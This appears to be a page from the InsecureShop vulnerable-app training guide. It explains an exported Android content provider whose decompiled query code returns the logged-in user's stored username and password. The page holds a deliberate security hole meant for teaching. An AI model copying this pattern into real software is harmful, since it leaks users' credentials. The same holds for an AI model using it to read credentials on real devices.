Insecure Content Provider

The Content Provider com.insecureshop.contentProvider.InsecureShopProvider is exported due to the presence of flag android:exported="true".

<provider android:name="com.insecureshop.contentProvider.InsecureShopProvider" android:readPermission="com.insecureshop.permission.READ" android:exported="true" android:authorities="com.insecureshop.provider"/>

The content provider com.insecureshop.contentProvider.InsecureShopProvider contains the following code:

public boolean onCreate() {
        android.content.UriMatcher uriMatcher2 = new android.content.UriMatcher(-1);
        uriMatcher = uriMatcher2;
        if (uriMatcher2 == null) {
            return true;
        }
        uriMatcher2.addURI("com.insecureshop.provider", "insecure", 100);
        return true;
    }

    public android.database.Cursor query(android.net.Uri uri, java.lang.String[] projection, java.lang.String selection, java.lang.String[] selectionArgs, java.lang.String sortOrder) {
        kotlin.jvm.internal.Intrinsics.checkParameterIsNotNull(uri, "uri");
        android.content.UriMatcher uriMatcher2 = uriMatcher;
        if (uriMatcher2 == null || uriMatcher2.match(uri) != 100) {
            return null;
        }
        android.database.MatrixCursor cursor = new android.database.MatrixCursor(new java.lang.String[]{"username", "password"});
        java.lang.String[] strArr = new java.lang.String[2];
        java.lang.String username = com.insecureshop.util.Prefs.INSTANCE.getUsername();
        if (username == null) {
            kotlin.jvm.internal.Intrinsics.throwNpe();
        }
        strArr[0] = username;
        java.lang.String password = com.insecureshop.util.Prefs.INSTANCE.getPassword();
        if (password == null) {
            kotlin.jvm.internal.Intrinsics.throwNpe();
        }
        strArr[1] = password;
        cursor.addRow(strArr);
        return cursor;
    }

If the content provider matches the URI insecure, then it allows us to access username and password of the logged-in user.

Last updated

Was this helpful?